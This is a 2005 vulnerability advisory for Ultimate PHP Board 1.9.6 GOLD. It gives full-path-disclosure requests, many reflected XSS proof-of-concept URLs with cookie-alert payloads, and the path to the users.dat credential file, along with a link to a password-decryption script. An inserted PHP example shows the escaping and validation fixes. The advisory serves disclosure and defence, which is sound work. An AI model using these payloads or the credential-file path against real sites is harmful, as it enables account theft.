M4DR007-06SA (security advisory): Multiple vulnerabilities in UPB 1.9.6 GOLD
Published: 06 16 2005
Released: 06 16 2005
Name: Ultimate PHP Board (UPB)
Affected Systems: <= 1.9.6 GOLD
Issue: Full Path Disclosure, Cross-Site Scripting, Sensitive Information Disclosure
Author: Alberto Trivero
Vendor: http://www.myupb.com/ourscripts_upb.php
Software Description
***********
"UPB is a forum/message board script. It supports threaded discussion with a
comprehensive text database system that we wrote here at php outburst for the
backend."
Full Path Disclosure
*******
Because the values of some variables are not properly checked, it is possible
to trigger errors that reveal the full installation path by sending simple
requests like these:
http://www.example.com/upb/viewtopic.php?id=0
http://www.example.com/upb/profile.php?action=get&id=0
http://www.example.com/upb/newpost.php?t_id=0
Cross-Site Scripting (XSS)
*******
Let's look at the code from login.php at line 69:
<?
...
echo "<form action='login.php?ref=$ref&l=1' method=POST>
<center>$skin_tableheading
...
?>
The $ref parameter can be controlled by a remote user and UPB does not
sanitise the value properly before echoing it, so a malicious user can inject
HTML code like this:
'><script>alert(document.cookie)</script>
which turns the HTML line into:
<form action='login.php?ref='><script>alert(document.cookie)</script>&l=1' method=POST>
executing the <script>...</script> tag, which in this case displays the cookies.
This is the PoC URL:
http://www.example.com/upb/login.php?ref=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Now let's look at the code from viewtopic.php at line 13:
<?
...
$where = "<b>></b> <a href='viewforum.php?id=$id'>$w_forum[forum]</a>
<b>></b> $w_topic[subject]";
...
?>
The $id parameter has the same problem, exploitable with a URL like this:
http://www.example.com/upb/viewtopic.php?id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
These are PoC URLs for other parameters:
http://www.example.com/upb/viewtopic.php?id=1&t_id=1&page=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/upb/profile.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/upb/newpost.php?id=1&t=1&t_id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/upb/newpost.php?id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/upb/email.php?id=%27%3E%3Cscript%3Ealert(document.cookies)%3C/script%3E
http://www.example.com/upb/icq.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/upb/aol.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/upb/getpass.php?ref=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/upb/search.php?step=3&sText=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
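Both echo sites above share one root cause: request parameters are written raw into HTML. The following is an added example (not UPB's own code; function names are mine) that places the advisory's login.php pattern beside a hardened version and shows the input validation that also removes the id=0 error path used for full path disclosure:

```php
<?php
// Added example, not part of UPB. Shows the advisory's vulnerable echo
// beside a hardened form. Function names are hypothetical.

// Vulnerable pattern from login.php: $ref is echoed raw into a
// single-quoted attribute, so a value starting with '> closes the
// attribute and the tag, and whatever follows is parsed as markup.
function login_form_vulnerable(string $ref): string
{
    return "<form action='login.php?ref=$ref&l=1' method=POST>";
}

// Escape for HTML attribute context. ENT_QUOTES is essential here:
// the attribute is single-quoted, and before PHP 8.1 the default flags
// left the single quote unescaped, so the advisory's payload would
// still break out.
function html_attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function login_form_hardened(string $ref): string
{
    // The value lands inside a query string inside an attribute, so it
    // gets both layers: URL encoding first, then HTML attribute encoding.
    $safe = html_attr(urlencode($ref));
    return "<form action='login.php?ref=$safe&l=1' method=POST>";
}

// Numeric parameters such as viewtopic.php?id= should never reach an
// echo as strings. Accept only a positive integer; the caller then
// answers "no such topic" instead of letting PHP error out (the id=0
// requests in the advisory rely on exactly that error output).
function topic_id($raw): ?int
{
    if (!is_string($raw) && !is_int($raw)) {
        return null;
    }
    if (!preg_match('/^[1-9][0-9]*$/', (string) $raw)) {
        return null;
    }
    return (int) $raw;
}

// Self-check with the advisory's payload (constructed input).
$payload = "'><script>alert(document.cookie)</script>";
$out = login_form_hardened($payload);
if (strpos($out, '<script') !== false || strpos($out, "ref='>") !== false) {
    throw new RuntimeException('attribute escaping failed');
}
if (topic_id('0') !== null || topic_id($payload) !== null || topic_id('42') !== 42) {
    throw new RuntimeException('id validation failed');
}
echo $out, "\n";
```

Pair this with display_errors=Off in production, which closes the full path disclosure even where an unexpected error still slips through.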
Sensitive Information Disclosure
*********
In many cases (always with non-Apache web servers, but sometimes also with
Apache) it is possible to obtain sensitive information about all the users
registered on the UPB forum by browsing to this file:
http://www.example.com/upb/db/users.dat
and viewing information structured in this way:
user_name<~>password<~>level<~>email<~>view_email<~>mail_list<~>location<~>url<~>avatar<~>icq<~>aim<~>msn<~>sig<~>posts<~>date_added<~>id
The users' passwords are encrypted, and to automate the decryption I made a
script available at this address: http://albythebest.altervista.org/upb.pl
Solution
*********
The vendor has been contacted many times, but a patch has not yet been produced.
Alberto Trivero - trivero@xxxxxxxx
Come cheer us at #security-it on Freenode ( irc.freenode.net )
(C) 2005 Copyright by Madroot Security Group